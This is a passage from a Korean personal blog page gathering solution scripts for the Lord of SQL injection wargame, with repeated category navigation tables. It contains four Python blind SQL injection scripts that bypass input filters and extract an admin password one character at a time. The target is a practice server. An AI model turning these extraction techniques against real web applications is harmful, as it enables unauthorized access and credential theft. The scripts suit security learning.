'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS zombie_assassin (0) | 2018.02.08 |
|---|---|
| LOS assassin (0) | 2018.02.08 |
| LOS bugbear (0) | 2018.02.08 |
| LOS darknight (0) | 2018.02.08 |
| LOS golem (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간
'Wargame/Lord of SQL'에 해당되는 글 44건
- 2018.02.08 LOS giant
- 2018.02.08 LOS bugbear
- 2018.02.08 LOS darknight
- 2018.02.08 LOS golem
- 2018.02.08 LOS skeleton
- 2018.02.08 LOS vampire
- 2018.02.08 LOS troll
- 2018.02.08 LOS orge
- 2018.02.08 LOS darkelf
- 2018.02.08 LOS wolfman
import urllib2
def request(data):
url = "https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?no="+data
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=4781bkenk59ojptdqpoj0um423')
response = urllib2.urlopen(req).read()
print str(response)
if "Hello admin" in str(response):
return True
else:
return False
length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"
for i in range(0,50):
payload = "1%09||%091%09regexp%091%09%26%26%09id%09regexp%09concat(char(97),char(100),char(109),char(105),char(110))%09%26%26%09length(pw)%09regexp%09"+str(i)
if request(payload)==True:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
for i in range(48,127):
if (i>57 and i<65) or (i>90 and i<97):
continue
payload = "1%09||%091%09regexp%091%09%26%26%09id%09regexp%09concat(char(97),char(100),char(109),char(105),char(110))%09%26%26%09right(left(pw,"+str(j)+"),1)%09regexp%09char("+str(i)+")"
if request(payload)==True:
admin_pw += chr(i)
print "[-]Admin Password = " + admin_pw
break
print "[*]Admin Password = " + admin_pw
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS assassin (0) | 2018.02.08 |
|---|---|
| LOS giant (0) | 2018.02.08 |
| LOS darknight (0) | 2018.02.08 |
| LOS golem (0) | 2018.02.08 |
| LOS skeleton (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간
import urllib2
def request(data):
url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?no="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
response = urllib2.urlopen(req).read()
if "Hello admin" in str(response):
return True
else:
return False
length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"
for i in range(0,50):
payload = "1 || 1 like 1 && id like 0x61646d696e && length(pw) like "+str(i)+"#"
if request(payload)==True:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
for i in range(0,len(strings)):
payload = "1 || 1 like 1 && id like 0x61646d696e && right(left(pw,"+str(j)+"),1) like 0x"+strings[i].encode('hex')+"#"
if request(payload)==True:
admin_pw += strings[i]
print "[-]Admin Password = " + admin_pw
break
print "[*]Admin Password = " + admin_pw
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS giant (0) | 2018.02.08 |
|---|---|
| LOS bugbear (0) | 2018.02.08 |
| LOS golem (0) | 2018.02.08 |
| LOS skeleton (0) | 2018.02.08 |
| LOS vampire (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간
import urllib2
def request(data):
url = "https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
response = urllib2.urlopen(req).read()
if "Hello admin" in str(response):
return True
else:
return False
length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"
for i in range(0,50):
payload = "' || id like 'admin' && length(pw) like "+str(i)+"#"
if request(payload)==True:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
for i in range(0,len(strings)):
payload = "' || id like 'admin' && pw like '"+admin_pw+strings[i]+"%'#"
if request(payload)==True:
admin_pw += strings[i]
print "[-]Admin Password = " + admin_pw
break
print "[*]Admin Password = " + admin_pw
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS bugbear (0) | 2018.02.08 |
|---|---|
| LOS darknight (0) | 2018.02.08 |
| LOS skeleton (0) | 2018.02.08 |
| LOS vampire (0) | 2018.02.08 |
| LOS troll (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS darknight (0) | 2018.02.08 |
|---|---|
| LOS golem (0) | 2018.02.08 |
| LOS vampire (0) | 2018.02.08 |
| LOS troll (0) | 2018.02.08 |
| LOS orge (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS golem (0) | 2018.02.08 |
|---|---|
| LOS skeleton (0) | 2018.02.08 |
| LOS troll (0) | 2018.02.08 |
| LOS orge (0) | 2018.02.08 |
| LOS darkelf (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS skeleton (0) | 2018.02.08 |
|---|---|
| LOS vampire (0) | 2018.02.08 |
| LOS orge (0) | 2018.02.08 |
| LOS darkelf (0) | 2018.02.08 |
| LOS wolfman (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간
import urllib2
def request(data):
url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
response = urllib2.urlopen(req).read()
if "Hello admin" in str(response):
return True
else:
return False
length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"
for i in range(0,50):
payload = "' || id='admin' && length(pw)="+str(i)+"#"
if request(payload)==True:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
for i in range(0,len(strings)):
payload = "' || id='admin' && substr(pw,"+str(j)+",1) like '"+strings[i]+"%'#"
if request(payload)==True:
admin_pw += strings[i]
print "[-]Admin Password = " + admin_pw
break
print "[*]Admin Password = " + admin_pw
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS vampire (0) | 2018.02.08 |
|---|---|
| LOS troll (0) | 2018.02.08 |
| LOS darkelf (0) | 2018.02.08 |
| LOS wolfman (0) | 2018.02.08 |
| LOS orc (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS troll (0) | 2018.02.08 |
|---|---|
| LOS orge (0) | 2018.02.08 |
| LOS wolfman (0) | 2018.02.08 |
| LOS orc (0) | 2018.02.08 |
| LOS goblin (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS orge (0) | 2018.02.08 |
|---|---|
| LOS darkelf (0) | 2018.02.08 |
| LOS orc (0) | 2018.02.08 |
| LOS goblin (0) | 2018.02.08 |
| LOS cobolt (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간